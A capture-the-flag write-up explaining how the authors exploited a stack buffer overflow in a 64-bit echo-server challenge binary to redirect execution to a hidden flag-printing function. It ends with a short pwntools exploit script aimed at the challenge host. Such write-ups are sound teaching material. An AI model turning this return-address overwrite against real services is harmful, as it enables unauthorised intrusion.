Tags: pwn
Rating:
# Exploit 200 - My gift
> Writeup by f0xtr0t (Jay Bosamiya)
@p4n74 (Rakholiya Jenish) and I were working on this challenge. Was quite a bit of fun, especially since the exploit code I wrote didn't work, and an equivalent code written by p4n74 did :P Still trying to figure out why :D
The [given file](exp200.bin) is a 64-bit ELF executable. Opening it up in IDA Pro, we realize that it is a standard forking-server, which opens up the port `1337`. When a client connects, it is a simple echo service. Any string sent is `recv`d, and then `puts`d back. This is handled through a `dup2` based file-descriptor redirect.
The vulnerability is that there is a stack based buffer that stored the `recv`d string, and the `recv` can overwrite longer than the buffer size, allowing us onto the saved EBP and saved EIP on the stack. There is no stack canary either (though if it did exist, leaking it via the `puts` would be easy enough).
We want to overwrite the saved EIP with `0x400B90` (which wonder of wonders, IDA doesn't detect as a function, but is the one that opens a `gift` file and outputs it).
After achieving the overwrite, we need to exit out of the function. Now this should be easy, since the code has checks for checking the letters `'s'`, `'t'`, `'o'`, and `'p'`. Now this is where we wasted a lot of time. Turns out, it checks these at positions 0, 1, 2, and **4**; but we were assuming it checks at 0, 1, 2, and **3**. The moment we send a `stoap`, it breaks out of the function, calling our overwritten EIP.
Now, it was only a matter of coding it up.
[Pwntools](http://pwntools.readthedocs.io/) make life very easy for this, and it was only a matter of writing the following script, which breaks in, and gets the flag :)
```
from pwn import *
payload = ''
payload += "A"*0x68
payload += p64(0x400b90)
conn = remote("10.13.37.22", 1337)
conn.send(payload)
conn.recv()
conn.sendline('stoap')
conn.recv()
print conn.recv().rstrip()
conn.close()
```
